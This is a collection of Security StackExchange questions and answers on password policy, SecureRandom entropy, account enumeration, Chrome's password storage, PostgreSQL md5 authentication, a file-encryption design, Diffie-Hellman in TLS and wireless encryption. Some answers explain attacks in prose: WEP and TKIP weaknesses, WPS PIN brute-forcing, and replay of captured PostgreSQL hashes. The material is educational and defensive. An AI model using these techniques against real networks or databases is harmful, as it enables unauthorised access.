$this -> set_message('is_password', 'Password is too long.');
return FALSE;
} elseif (!preg_match("#[0-9]+#", $str)) {
$this -> set_message('is_password', 'Password must include at least one number.');
return FALSE;
} elseif (!preg_match("#[a-z]+#", $str)) {
$this -> set_message('is_password', 'Password must contain at least one letter.');
return FALSE;
} elseif (!preg_match("#[A-Z]+#", $str)) {
$this -> set_message('is_password', 'Password must contain at least one capital letter.');
return FALSE;
} elseif (!preg_match("#\W+#", $pwd)) {
$this -> set_message('is_password', 'Password must include at least one symbol.');
return FALSE;
} else {
return TRUE;
}
} My thought on this is, if we let the "user" / attacker know what my passwords consist of wouldn't it be easier for the attacker to know? I know security through obscurity is not a best practice, but could it be a strong argument in this situation? I would like to know if I am going about this in the right way. Any help would be great. | If you do not divulge your "password requirements" then your users will hate you. Some will not succeed in finding an "acceptable password" and will call the helpdesk. Or, worse, if the users are customers then they will go buy elsewhere. A great way to kill your own business ! On the other hand, if divulging your "password requirements" really help attackers in a non-negligible way, then your password requirements are awfully bad: not only do they antagonize users, but they also restrain the users into a too small set of possible passwords. Note that attackers can usually guess quite well what your "password requirements" are, e.g. by trying to register themselves. In any case, "password requirements" are counter-productive and decrease security, save for a "minimum length" which can be rationally justified. So just don't do that. Key to password security is user education , possibly helped with some tools (e.g. a random generator for strong passwords). Enforcing constraints does not help; and enforcing hidden constraints is just worse. For instance, if your rules call for at least one digit and one symbol, then a surprisingly high proportion of users will just append "1." at the end of their password; attackers know that. The extra suffix will not add much to the password entropy (i.e. the number of potential passwords the attacker has to try for a successful break) but will use up some of the scarce resource known as "user patience": users will prefer shorter passwords, since they have to add the "1." suffix to appease your server. | {
"source": [
"https://security.stackexchange.com/questions/40564",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/29474/"
]
} |
40,633 | I know from experience that reading from /dev/random blocks when the Linux kernel entropy pool runs out of entropy. Also, I've seen many articles and blog entries stating that when running on Linux, java.security.SecureRandom uses /dev/random as its entropy source and thus blocks when the kernel entropy pool runs out of entropy. However, I'm unable to produce an experiment which causes SecureRandom to block. Conversely, it seems easy to get a simple bash one-liner which reads from /dev/random to block. Here's the java code I'm using for these experiments: import java.security.SecureRandom;
public class A {
public static void main(String[] args) {
SecureRandom sr = new SecureRandom();
int out = 0;
for (int i = 0; i < 1<<20 ; i++) {
out ^= sr.nextInt();
}
System.out.println(out);
}
} It generates just over 1,000,000 random 32-bit integers. That should be 2^(20 + log2(32)) = 2^25 bits or 2^22 (a little over 4 million) bytes of entropy, right? However, it never blocks. It always finishes in about 1.2 seconds no matter whether I wiggle the mouse or not. The bash one-liner I used is: head -c 100 /dev/random | xxd This blocks easily. As long as I keep my hand off of the mouse and keyboard, it'll sit there doing nothing for several minutes. And I'm only asking for 100 bytes of entropy. Surely I'm missing something here. Could someone explain what's going on? Thanks! | Both OpenJDK and Sun read from /dev/urandom , not /dev/random , at least on the machine where I tested (OpenJDK JRE 6b27 and Sun JRE 6.26 on Debian squeeze amd64). For some reason, they both open /dev/random as well but never read from it. So the blog articles you read either were mistaken or applied to a different version from mine (and, apparently, yours). You can check whether yours reads from /dev/random or /dev/urandom by tracing it: strace -o a.strace -f -e file java A and look for the relevant part of the trace: 21165 open("/dev/random", O_RDONLY) = 6
…
21165 open("/dev/urandom", O_RDONLY) = 7
…
21165 read(7, "\322\223\211\262Zs\300\345\3264l\254\354[\6wS\326q@", 20) = 20
… Don't worry, /dev/urandom is perfectly fine for cryptography. | {
"source": [
"https://security.stackexchange.com/questions/40633",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/17025/"
]
} |
40,694 | Someone told me it shouldn't be possible for someone to detect if a certain email address is used by a registered user on a website. So, for instance, when the user asks to reset his password, you should say "Password sent" whether the email exists in the database or not. If not, people can use this function to check who is a member and also check validity of spam lists, etc. But I noticed that Facebook says "E-mail already registered" if you try to register the same e-mail twice. Does this mean that conventions have changed; that informing the user is more important than revealing accounts? | It is a rather old tradition not to tell people whether specific logins exist or not. This is why Unix or Windows systems, when asking for user credentials, will respond to any error with a generic "wrong username or password" message. The idea comes from a rather old-fashioned vision of attacks: envision a bad guy who wants to enter a mainframe, and succeeds in getting his hands on a serial terminal plugged to the system, or maybe a telnet interface over a modem line. This attacker will be in a position of an online dictionary attack : he will try to guess a pair login+password which grants access. The administrative login names like "root" were usually better protected than normal user accounts (the "root" user was better at selecting strong passwords, or at least so it was surmised) so attackers would try to find normal user accounts, and, in particular, normal user account names . Watching the movie War Games (from 1983) gives you a good idea of how things were. Note the critical point: in the attack scenario above, the attacker wants to obtain at least an account, but could not get one under normal conditions, or even know who has an account. It is now 2013, three decades after that movie. We have servers where everybody can register for free, and get an account. Obtaining one account is thus no longer an attacker's goal. Instead, the attacker will want to access specific accounts, with known identities. This is not the same situation. The context has changed. Therefore, old lore is not necessarily applicable. Anyway, when a user tries to register on Facebook, he expects the process to work. At that point, the process may fail for only one plausible reason, which is an email address already used. It would be difficult to hide that fact from the user... If we want to "protect" user email addresses, then the registration process must go thus: User enters his alleged email. An email is sent to that address, containing a one-time registration link; however, if the email is already registered, then an email is sent explaining that fact. No clue is written on the response Web page as to whether the email already existed in the system or not. The user registers by following the link from the email. Such a process would double as an email verification process, so that's kind of good. However, it has some latency (user must get out of the Web site, open his email reader, and wait for the incoming email), so this can be problematic for shopping sites (users are not patient, and they are prone to go shop elsewhere if they find the checkout process too cumbersome). Also, there must be some guardrails to avoid this registration system to be abused into a spamming machine. I think it can be said that, for Facebook maintainers, making the registration process as smooth and quick as possible is more important than the user's privacy. Really, who would that surprise ? | {
"source": [
"https://security.stackexchange.com/questions/40694",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/18270/"
]
} |
40,812 | I want to add a password blacklist that would prevent the 1000 most common passwords from being used in order to mitigate shallow dictionary attacks. Is there any negative implication of storing this blacklist in the database? | In that order of magnitude (1000 passwords), I don't see any down sides from a security point of view. If anything, I'd say it's a good idea. Granted, you'll be shrinking the pool of possible passwords which, theoretically, decreases the security. In practice, however, those most commonly used passwords will be one of the first wordlists an attacker would try. In fact, I've seen a few web services disclosing this in their registration forms. Some even block whole dictionaries in addition to common passwords. | {
"source": [
"https://security.stackexchange.com/questions/40812",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/29666/"
]
} |
40,884 | Justin Schuh defended Google's reasoning in the wake of this post detailing the " discovery " (sic) that passwords saved in the Chrome password manager can be viewed in plaintext. Let me just directly quote him: I'm the Chrome browser security tech lead, so it might help if I
explain our reasoning here. The only strong permission boundary for
your password storage is the OS user account. So, Chrome uses whatever
encrypted storage the system provides to keep your passwords safe for
a locked account. Beyond that, however, we've found that boundaries
within the OS user account just aren't reliable, and are mostly just
theater. Consider the case of someone malicious getting access to your account.
Said bad guy can dump all your session cookies, grab your history,
install malicious extension to intercept all your browsing activity,
or install OS user account level monitoring software. My point is that
once the bad guy got access to your account the game was lost, because
there are just too many vectors for him to get what he wants. We've also been repeatedly asked why we don't just support a master
password or something similar, even if we don't believe it works.
We've debated it over and over again, but the conclusion we always
come to is that we don't want to provide users with a false sense of
security, and encourage risky behavior. We want to be very clear that
when you grant someone access to your OS user account, that they can
get at everything. Because in effect, that's really what they get. I've been using LastPass under the assumption that it is better and safer than using Chrome's built-in password manager. There are two additional facts that are relevant here: LastPass has an option to stay signed in on a trusted computer. Let's assume I use it. Chrome lets you create a separate password for Google's synced data (read: stored passwords). Let's assume I do this as well. With those givens, all other things being equal, is LastPass any safer than Chrome? It seems like once malicious software gets on my system, or a bad guy has access, it doesn't matter from a theoretical perspective, I'm 100% compromised. Is that true? Also, from a practical perspective, is one or the other more likely to be hacked in real life? Are there certain attack vectors which are more common or more successful that would work one one of these or not the other? PS: I don't care about friends, family or novices gaining access to my account. I'm asking about intelligent malicious hackers. | NOTE This answer may be outdated due to improvements in Chrome since this answer was written. First of all, Chrome does encrypt your passwords and other secret data. But there's are different aspects to this depending on the setting, plus a few details that you should keep in mind. On your Computer, In your OS When passwords are saved locally on your computer, Google will attempt to use whatever local password vault might exist. So for example, if you're on OSX, that's the system's Keychain . If you're on Windows, it's the Windows Data Protection API (Microsoft has a peculiar skill for naming products), if you're on KDE, it's the Wallet , in GNOME it's Gnome Keyring . Each of these products has its own implications that are worth noting. For example, if you ever sync your passwords on an OSX device, those passwords go into the Keychain (as mentioned) which has been re-branded the iCloud Keychain -- the implications of which are exactly what they sound like: now Apple knows your saved passwords too, and will sync them to your iPhone, your iPad and any other Apple devices. That may be precisely what you wanted. And maybe not. Just be aware. The Windows Exciting Names And Data Protection API Professional Edition boasts no such features. Your passwords are on your computer, and there they stay until further notice. Call it old-fashioned or call it safe. But bear in mind that Microsoft has a history of chasing Apple, and may decide to do so here as well. In the Cloud In addition to any unintentional iCloud syncing as mentioned above, Chrome will also sync your passwords between Chrome instances. This means sending your data to Google. Yes it's encrypted. How is it encrypted? That's up to you. You can either use your Google Account (the default), or you can set a special "sync passphrase". While I have no special knowledge of the internals of these two options, the implications appear pretty straight-forward. If you use your Google Account password, then the passwords are decrypted with no further intervention on your part. Note that the actual password is in fact required; access to the Google Account alone isn't sufficient. I've seen situations where Chrome had successfully managed to log in and fetch its sync data through external authorization but was not able to decrypt it until I typed in the original Gmail password. The advantage, therefore, of using a separate "sync passphrase" is to make sure that anyone who has your Gmail password (presumably Google could, for example) will not have your sync password. Remembering autocomplete=off Passwords The geek.com article mentioned brings up an interesting point, but that point is traditionally argued from a position of... unenlightenment. It's a common position held by "privacy advocates" (particularly the kind for whom I'd put that term in quotes) but the security implications are very, very, very clear, and very definitely, squarely on the side Google takes. I've written about this already. Go read that other answer and then come back. I'll wait. Go on. OK, back? OK, here are the critical points while they're fresh on your mind: autocomplete=off was an intervention added to turn off a very dangerous feature. That feature is not the password saving we've been talking about. The feature we've been talking about helps users. That other one was a misguided attempt at being useful by filling in forms using things you typed on other websites. So imagine an autocomplete assistant like Clippy, but with worse social skills: "I see you're trying to log in to Ebay; I'll just fill in your login from Yahoo and we can see if that works." Yeah, we had funny ideas about security back in the 90's. You can see why putting autocomplete=off into everything even remotely security-related quickly became a bullet-point in site audits. By comparison, the autocomplete that we've been talking about is a very carefully-controlled security-enhancing solution. And if you use it for anything at all , you'll want to use it for your most secure passwords? Why? Phishing. Phishing is literally the single most dangerous online attack facing you. It's super-effective and super-devastating. It doesn't get nearly the attention it should because we always just point a finger at the stupid user who gave the Syrian Electronic Army his password. But defending against phishing is really, really hard, and exploiting it is therefore really, really easy. Furthermore, a successful phishing exploit has unlimited damage potential, all the way up to shutdown-the-whole-bloody-company sort of disasters. And in protecting against phishing, your single greatest weapon is a browser-integrated password manager. It knows where your passwords should be used, and locks you out from using them unless you're actually looking at the right site. It's not fooled by look-alike domains or "site seal" graphics, it knows to check the SSL certificate and knows how to check the SSL certificate. It keeps your passwords locked up until you're ready to use them and staring at the correct login prompt. Should the Chrome password manager ignore the autocomplete=off message? MOST DEFINITELY YES. Should you use it? If you're using LastPass then you're fine sticking with that. But this should be considered a reasonable alternative if the caveats mentioned above don't bother you. If you're not using any password manager, then start using this one right now . It's safe by any reasonable measure, and in particular, far safer than not using it. | {
"source": [
"https://security.stackexchange.com/questions/40884",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/25338/"
]
} |
41,028 | As a learning project, I am trying to implement a secure way to share files with a friend over dropbox. (I am not looking for existing software, I am doing this in order to learn how to do this right.) Of course I will not try to invent my own encryption algorithm. I have a file that I want to send to my friend securely. We both have my Project-to-be on our machines, and a shared dropbox folder. (although means of transfer should be irrelevant). Each of us has a RSA keypair, we have exchanged public keys using a secure method (in person via USB stick, or via GPGed email). I will use RSACryptoServiceProvider with a keysize of 4096 bits for these Keys. (I am considering maybe soon 8192 bits, since I found out that the huge pause of 8-11 seconds in my test application isn't caused by RSA keypair generation, nor encryption, but by key2string or key2base64 operations!) The Keys are stored locally in a text file. The private key is encrypted with AESCryptoServiceProvider in CBC mode, PKCS7 Padding, 256-Bit. The IV will be completely random generated by the CSP. The symmetric key will be derived from a password using Rfc2898DeriveBytes (==PBKDF2), 1000 Iterations, salt from RNGCryptoServiceProvider. (Salt length == final key length) The file is encrypted, again using AESCryptoServiceProvider in CBC mode, PKCS7 Padding, 256-Bit. Key and IV will be completely random for each file, produced by the CSP itself. The IV will be prepended to the encrypted filedata. This package will be hashed using HMACSHA512 with a random key. I don't know whether to use RNGCSP or the HMAC internal randomkeygen , because until now,
I wasn't able to find out how secure that internal method is. (Is this NIST-approved?) The HMAC will be prepended to the IV:cryptedfile package. The HMAC-Key and the AES-Key will be (separately) encrypted with my friend's public key, and in such encrypted form be prepended to the package: cryptedAESKey:cryptedHMACKey:HMAC:IV:cryptedfile this package will be saved as binary to the shared DropBox folder, using the same name and extension the original had. This is because I haven't worked anything out for the filename yet, not even thought about it, suggestions are very welcome. On the receiving end, of course the process works in reverse: enter passphrase to unlock private key decrypt HMAC and AES Key authenticate file decrypt using key and iv save as original filename So, am I doing it right? In other words, do you see any problems, any faux-pas, no-gos, misunderstandings on my side, whatever? I am looking for your experienced verdict on my project, what could be done better, different, not at all, additionally? I think I covered all the things in lessons learned and everything my research has brought to surface. Right now, I am not interested in hiding the existence of communication. Furthermore, the keyhandling inside my application is also not of interest right now, I will get into that as a next step (securing memory against dumping etc.) after I've got the crypto part right. | Making your own crypto is fine as long as you understand that it is for learning , not for using . There are several "layers" in cryptography. There are algorithms , like RSA, AES, SHA-256... Then there are protocols , which assemble algorithms together. And then, there are implementations , which turn protocols into executable code. For a first grasp of cryptography, I usually recommend to go to implementation first: get an existing protocol, and implement it. This has some nice benefits, including the possibility to test your implementation against others, which is great in tracking bugs. This will also give you some insights on how protocols are structured, e.g. to support streamed operation. Since you are concentrating on the sending of a file as a single message, the model appears to be close to what OpenPGP purports to solve; therefore, making a working implementation of OpenPGP in C# is what I recommend. If you still choose to make your own protocol right away , then the following can be said about your choices: Your key sizes are overkill. 256-bit AES keys are quite useless in practice, since 128-bit keys are already quite far beyond that which is breakable with existing technology (e.g. see this answer ). Similarly, 4096-bit RSA keys are oversized; 2048 bits are already more than enough to ensure security. Since larger keys imply reduced performance, oversized keys imply unrealistic slowness which will not be representative of what can be achieved, thus lowering the pedagogical value of the whole endeavour. Conversely, 1000 rounds of PBKDF2 could be considered as too small. For a password-to-key conversion, the iterations are there for a "muscle show", to cope with the inherent weakness of the password (that is, the inherent weakness of the meat bag who will have to remember it), so you want that iteration count to be as high as is tolerable, thus relating to the power of your computer and your patience. A typical count value, with today's computer, would be around 100000 or even some millions. You use a MAC for the encryption of the file, but not for the encryption of your private key. This looks strange. There are situations where a MAC is not necessary, but most contexts where encryption is warranted also call for a MAC. It would be simpler to use the same format for both encryptions. You apply the MAC on the encrypted file: that's encrypt-then-MAC , and that's good -- and you did think of making the encryption IV part of the MAC input, which is even better (that's a classic mistake which you neatly avoided). You might want, though, to make some allowance for some future algorithm agility : maybe, at some point, you will want to use another symmetric encryption algorithm. In that case, some symbolic identifier for the encryption algorithm should also be part of the MAC input; this can be as simple as a first byte of value 0x00, leaving you some root for 255 other future algorithms. You use HMAC with SHA-512, which is not bad, but SHA-256 is not bad either and will offer substantially better performance on 32-bit systems. There again, race to the largest outputs and key sizes is artificial and sterile. SHA-256 is more than "secure enough". CBC mode and a separate MAC are "old style". There are modern encryption modes which combine the encryption and the MAC within a single primitive, reducing the possible scope of implementation errors; in particular, EAX and GCM . I understand that .NET does not offer them (yet); CipherMode is limited to CBC, CFB, CTS, ECB and OFB. In that case, CBC is not the worst choice, with an extra MAC (i.e. HMAC, as you suggest). To use CBC properly, an unpredictable random IV is necessary, and that's what you suggest (good). Be extra wary when implementing the decryption. You should first verify the MAC, and then, only if the MAC verification succeeded, may you proceed with the decryption. The tricky point is in the padding handling: an attacker could try to extract secrets from the recipient, by sending altered files and see how the recipient reacts, e.g. when the recipient found a syntactically valid padding or not. This is the basis of padding oracle attacks . You can process the incoming data in blocks, computing both the MAC and the putative decryption in parallel, but take care, for the last block, to compute and check the MAC first (this is the kind of hurdle that is avoided with GCM or EAX). Encrypting the key for AES and the key for HMAC is weird; it would allow a creative attacker to swap them around, making the recipient use the HMAC key for decryption, and vice versa. Although the benefits would not be obvious, it is very hard to tell whether a vulnerability exists that way; it depends on how "different" AES is from HMAC, a property which is not well-defined and, in any case, has not been thoroughly investigated. It seems safer, and also more performant, to use a single "master key" K , encrypted with the recipient's public key, and to derive the AES key and the HMAC key from it with some Key Derivation Function . It can be as simple as making K a 256-bit key (generated randomly) and splitting it in two halves, one for AES and the other for HMAC. Or you could make K longer (or even shorter), hash it with SHA-256, use split the SHA-256 output into two halves. The point is that a single RSA encryption is needed, not two. Also, deriving the encryption and MAC keys from a single source will map better to a possible future use of GCM or EAX. Your file format does not allow for streamed processing. In your format, the MAC is computed over the complete encrypted file, but its value comes first, before the encryption result. This means that the sender will have to process the whole file before beginning the sending. Thus, for a 1 GB file, 1 GB of temporary disk space (or RAM) will be necessary. This could be avoided if the MAC value was appended at the end, rather than stored in a prefix. Note that this buffering issue necessarily exists for the recipient, who must verify the MAC before using the decrypted data in any way. To fully cope with that, you would have to make a more complex format, with moderate-sized chunks, each with its own encryption and MAC, and some glue for secure assembly. The model would be SSL/TLS here. There is no authentication ! The recipient has no way of knowing whether the file he received indeed came from the alleged sender. To add authentication, in your setup, you will need digital signatures . Note that a digital signature may replace a MAC, if applied adequately , which is not an easily guaranteed property. It is safer to simply compute a signature (with the sender's private key) over the complete structure. There is no protection against replay attacks . An attacker, observing a file in transit, could send the same file again at a later date. It is then up to the recipient to take measures to detect such duplicates. This can be as simple as a date somewhere within the data file, under the protection of the MAC (and possibly the encryption, although this is not necessary), but it must be given some thought. By encrypting the private key yourself, I understand that you do not let the operating system take care of it. This could be limitative. Indeed, a RSACryptoServiceProvider instance could, potentially, use a key which physically resides in a smart card ; and even for software keys, there can be some security benefits with letting the OS take care of the storage (the OS has privileged access to the hardware, and can, for instance, avoid leaking secret keys to the disk through virtual memory ). By using an explicit key file , you make your system incompatible with such potentialities, which is a shame. There is no room for metadata, in particular a content type . The same sequence of bytes can have several interpretations, and there can be amusing consequences if the recipient can be induced into opening a HTML file as PDF or vice versa. Ideally, that which you actually encrypt should be a structure with a header containing a designation of the type of data (e.g. a media type ) followed by the data itself. All of this is said in no particular order and without claiming exhaustivity. The synthetic conclusion is that protocol design is not simple; it helps to have some solid implementation experience on which to base the design. | {
"source": [
"https://security.stackexchange.com/questions/41028",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/29828/"
]
} |
41,064 | According to Postgres's documentation , Postgres's password authentication method uses MD5 hashing to secure the password: The password-based authentication methods are md5 and password. These
methods operate similarly except for the way that the password is sent
across the connection, namely MD5-hashed and clear-text respectively. If you are at all concerned about password "sniffing" attacks then md5
is preferred. Plain password should always be avoided if possible.
However, md5 cannot be used with the db_user_namespace feature. If the
connection is protected by SSL encryption then password can be used
safely (though SSL certificate authentication might be a better choice
if one is depending on using SSL). I've heard from numerous sources that the MD5 hashing algorithm is no longer considered secure. Does this mean that I should avoid using password-based authentication for Postgres? If so, which alternative method should I use? | If using SSL, then what PostgreSQL does is fine. If not using SSL, but still doing the authentication across the network, then what PostgreSQL does stinks. Their games with MD5 are worthless, but not because they use MD5. MD5 has its own issues, but there they are just misusing it awfully. With "cleartext password" authentication, the client shows a user name and a password, and the server accepts them if they match what the server stored. With "md5" authentication, the client shows a value (which happens to be the MD5 hash of the concatenation of the password and the user name) and the server accepts it if it matches what the server stored. So you see it: in both cases , the client shows a bunch of bytes to the server, always the same sequence. It suffices for an attacker to tap on the network to observe these bytes, and then connect to the server and sends the same bytes to be granted entry. That the bytes are the result of a MD5 hash is completely irrelevant here. This MD5 hash is said to be password equivalent . As long as the connection can be eavesdropped at all (i.e. no SSL), then security goes down the drain. See this page for the details of the MD5 computation. They call it "encryption", which it is not at all (hashing is not encryption). We could even argue that using this MD5 decreases security: when a plaintext password is used, it can be forwarded to another authentication server (using Kerberos, LDAP,...) and that authentication server could then employ strong storage techniques (see password hashing ). With the PostgreSQL-specific MD5 hash, this cannot apply. When the "md5" authentication method is used, it MUST be against a table in the database which contains all these "md5" value as is. An attacker who can get his hands on, say, a backup tape or an old disk, will immediately obtain many free accounts on the database. And, I insist, nothing in all this has anything to do with MD5 cryptographic weaknesses. All of this would still apply if MD5 was replaced with SHA-512. | {
"source": [
"https://security.stackexchange.com/questions/41064",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/29865/"
]
} |
41,205 | I'm struggling to understand the (non-)use of Diffie-Hellman (DH) in TLS. DH has been around for a long time now, why does almost nobody use it, yet? DH is only being used for "key sharing", why does nobody use the DH secret to encrypt everything? Why do we need a symmetric key, when we already have a DH secret, that is good enough to transport yet another secret? That also applies to SSH (not?). I think there's a simple answer to that, but I couldn't find it. | Diffie-Hellman is used in SSL/TLS, as "ephemeral Diffie-Hellman" (the cipher suites with "DHE" in their name; see the standard ). What is very rarely encountered is "static Diffie-Hellman" (cipher suites with "DH" in their name, but neither "DHE" or "DH_anon"): these cipher suites require that the server owns a certificate with a DH public key in it, which is rarely supported for a variety of historical and economical reasons, among which the main one is the availability of a free standard for RSA ( PKCS#1 ) while the corresponding standard for Diffie-Hellman ( x9.42 ) costs a hundred bucks, which is not much, but sufficient to deter most amateur developers. Diffie-Hellman is a key agreement protocol , meaning that if two parties (say, the SSL client and the SSL server) run this protocol, they end up with a shared secret K . However, neither client or server gets to choose the value of K ; from their points of view, K looks randomly generated. It is secret (only them know K ; eavesdroppers on the line do not) and shared (they both get the same value K ), but not chosen . This is not encryption. A shared secret K is good enough, though, to process terabytes of data with a symmetric encryption algorithm (same K to encrypt on one side and decrypt on the other), and that is what happens in SSL. There is a well-known asymmetric encryption algorithm called RSA, though. With RSA, the sender can encrypt a message M with the recipient's public key, and the recipient can decrypt it and recover M using his private key. This time, the sender can choose the contents of M . So your question might be: in an RSA world, why do we bother with AES at all? The answer lies in the following points: There are constraints on M . If the recipient's public key has size n (in bytes, e.g. n = 256 for a 2048-bit RSA key), then the maximum size of M is n-11 bytes. In order to encrypt a longer message, we would have to split it into sufficiently small blocks, and include some reassembly mechanism. Nobody really knows how to do that securely . We have good reasons to believe that RSA on a single message is safe, but subtle weaknesses can lurk in any split-and-reassemble system and we are not comfortable with that. It is already bad enough with symmetric ciphers , where the mathematical situation is simpler, Even if we could handle the splitting-and-reassembly, there would be a size expansion. With a 2048-bit RSA key, an internal message chunk has the size of at most 245 bytes, but when encrypted, it yields to be a 256-byte sequence. This wastes our life energy, i.e. the network bandwidth. Symmetric encryption incurs only a bounded overhead (well, SSL adds a slight overhead proportional to the data size, but it is much smaller than what would occur with a RSA-only protocol), Compared to AES, RSA is slow as hell, We really like to have the option of using key agreement protocols like DH instead of RSA. In older times (before 2001), RSA was patented but DH was not, so the US government was recommending DH. Nowadays, we want to be able to switch algorithms in case one becomes broken. In order to support key agreement protocols, we need some symmetric encryption, so we may just as well use it with RSA. It simplifies implementation and protocol analysis. See this answer for a detailed description of how SSL works. | {
"source": [
"https://security.stackexchange.com/questions/41205",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/29984/"
]
} |
41,230 | Let's say I have a wireless network that is password protected. What procedures can an intruder take to gain access to my wireless network, or at least be able to decipher the packets I am sending into something understandable? How long would such a method take? For example, how exactly does aircrack gain access? This related question is about what happens once an attacker knows the password: I'm interested in how they get the password. | First of all that would entirely depend on the encryption used by the access point. There are several types of possible encryption. Mostly on consumer wireless access points these are: WEP WPA WPA2 WPS WEP Let's first dive into WEP. WEP was the first algorithm used to secure wireless access points. Unfortunately it was discovered that WEP had some serious flaws. In 2001, 3 researchers working at Berkeley produced a paper named " (In)Security of the WEP algorithm ". They found the following flaws in WEP: Passive attacks to decrypt traffic based on statistical analysis. Active attack to inject new traffic from unauthorized mobile stations, based on known plaintext. Active attacks to decrypt traffic, based on tricking the access
point. Dictionary-buildingattack that, after analysis of about a day's worth
of traffic, allows real-time automated decryption of all traffic. An excerpt from their paper about the technical problems with WEP: WEP uses the RC4 encryption algorithm, which is known as a stream
cipher. A stream cipher operates by expanding a short key into an
infinite pseudo-random key stream. The sender XORs the key stream with
the plaintext to produce ciphertext. The receiver has a copy of the
same key, and uses it to generate identical key stream. XORing the key
stream with the ciphertext yields the original plaintext. This mode of operation makes stream ciphers vulnerable to several
attacks. If an attacker flips a bit in the ciphertext, then upon
decryption, the corresponding bit in the plaintext will be flipped.
Also, if an eavesdropper intercepts two ciphertexts encrypted with the
same key stream, it is possible to obtain the XOR of the two
plaintexts. Knowledge of this XOR can enable statistical attacks to
recover the plaintexts. The statistical attacks become increasingly
practical as more ciphertexts that use the same key stream are known.
Once one of the plaintexts becomes known, it is trivial to recover all
of the others. WEP has defenses against both of these attacks. To ensure that a
packet has not been modified in transit, it uses an Integrity Check
(IC) field in the packet. To avoid encrypting two ciphertexts with the
same key stream, an Initialization Vector (IV) is used to augment the
shared secret key and produce a different RC4 key for each packet. The
IV is also included in the packet. However, both of these measures are
implemented incorrectly, resulting in poor security. The integrity check field is implemented as a CRC-32 checksum, which
is part of the encrypted payload of the packet. However, CRC-32 is
linear, which means that it is possible to compute the bit difference
of two CRCs based on the bit difference of the messages over which
they are taken. In other words, flipping bit n in the message results
in a deterministic set of bits in the CRC that must be flipped to
produce a correct checksum on the modified message. Because flipping
bits carries through after an RC4 decryption, this allows the attacker
to flip arbitrary bits in an encrypted message and correctly adjust
the checksum so that the resulting message appears valid. The initialization vector in WEP is a 24-bit field, which is sent in
the cleartext part of a message. Such a small space of initialization
vectors guarantees the reuse of the same key stream. A busy access
point, which constantly sends 1500 byte packets at 11Mbps, will
exhaust the space of IVs after 1500*8/(11*10^6)*2^24 = ~18000 seconds,
or 5 hours. (The amount of time may be even smaller, since many
packets are smaller than 1500 bytes.) This allows an attacker to
collect two ciphertexts that are encrypted with the same key stream
and perform statistical attacks to recover the plaintext. Worse, when
the same key is used by all mobile stations, there are even more
chances of IV collision. For example, a common wireless card from
Lucent resets the IV to 0 each time a card is initialized, and
increments the IV by 1 with each packet. This means that two cards
inserted at roughly the same time will provide an abundance of IV
collisions for an attacker. (Worse still, the 802.11 standard
specifies that changing the IV with each packet is optional!) Some other interesting reading material can be found at aircrack-ng.org . WPA The second one is WPA. WPA was originally meant as a wrapper to WEP which tackles the insecurities caused by WEP. It was actually never meant as a security standard but just as a quick fix until WPA2 became available. There are two modes in which it can operate: WPA-PSK: Preshared key (password) WPA-Enterprise: This requires a RADIUS server and can be combined with an Extensible Authentication Protocol (EAP). WPA generally uses Temporal Key Integrity Protocol (TKIP). TKIP was designed by the IEEE 802.11i task group and the Wi-Fi Alliance as a solution to replace WEP without requiring the replacement of legacy hardware. This was necessary because the breaking of WEP had left WiFi networks without viable link-layer security, and a solution was required for already deployed hardware. TKIP is not an encryption algorithm, but it's used to make sure that every data packet is sent with a unique encryption key. From the aircrack-ng.org paper TKIP implements a more sophisticated key mixing function for mixing a
session key with an initialization vector for each packet. This
prevents all currently known related key attacks because every byte of
the per packet key depends on every byte of the session key and the
initialization vector. Additionally, a 64 bit Message Integrity Check
(MIC) named MICHAEL is included in every packet to prevent attacks on
the weak CRC32 integrity protection mechanism known from WEP. To
prevent simple replay attacks, a sequence counter (TSC) is used which
allows packets only to arrive in order at the receiver. There are two attacks known against TKIP: Beck-Tews attack Ohigashi-Morii attack (which is an improvement on the Beck-Tews attack) However both of these attacks only could decrypt small portions of data, compromising confidentiality. What they can't give you is access to the network. To give you an idea of how much data can be recovered, a single ARP frame would take around 14-17 minutes to get the plain text. The only attack know, besides flaws in firmware of some routers, is bruteforcing the WPA key. Generally the key is generated as follows: Key = PBKDF2(HMAC−SHA1,passphrase, ssid, 4096, 256) Considering this algorithm is meant to prevent hashed passwords from being broken it can take a huge amount of time. The only reasonable attack would be to use a dictionary attack (hence it is important to use long passwords containing characters, numbers and letters). Also note that you need to change your SSID to something very random. Rainbow tables have been generated for the top 1000 used SSIDs . WPA also supports AES (which can be used instead of RC4). This would still imply that TKIP-MIC is used. WPA2 WPA2 supports the same modes as WPA, except that it does not use TKIP but CCMP for cryptograhic encapsulation. CCMP is an enhanced data cryptographic encapsulation mechanism designed for data confidentiality and based upon the Counter Mode with CBC-MAC (CCM) of the AES standard. This is used to replace TKIP for message confidentiality. However some access points can still be configured to use both TKIP and CCMP. This was done because otherwise people were required to upgrade their hardware. Extensions WPS Wi-Fi Protected Setup (WPS; originally Wi-Fi Simple Config) is a computing standard that attempts to allow easy establishment of a secure wireless home network. It allowed easy security for home users but still using the more secure WPA rather than WEP. WPS should never be used as there is a great design flaw in it. WPS generates 'by the push of a buton' a PIN code which can be entered by the user. The idea behind this was to increase usability. This poses a problem: the amount of possibilities is reduced to 10.000.000 which any computer can crunch through quite rapidly, even when using PBKDF2. EAP EAP is used for WPA(2)-Enterprise and is an authentication framework, not a specific authentication mechanism. It provides some common functions and negotiation of authentication methods called EAP methods. There are currently about 40 different methods defined. Some have their own flaws however considering the vast amount of possibilities I suggest looking them up yourself. | {
"source": [
"https://security.stackexchange.com/questions/41230",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/27627/"
]
} |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.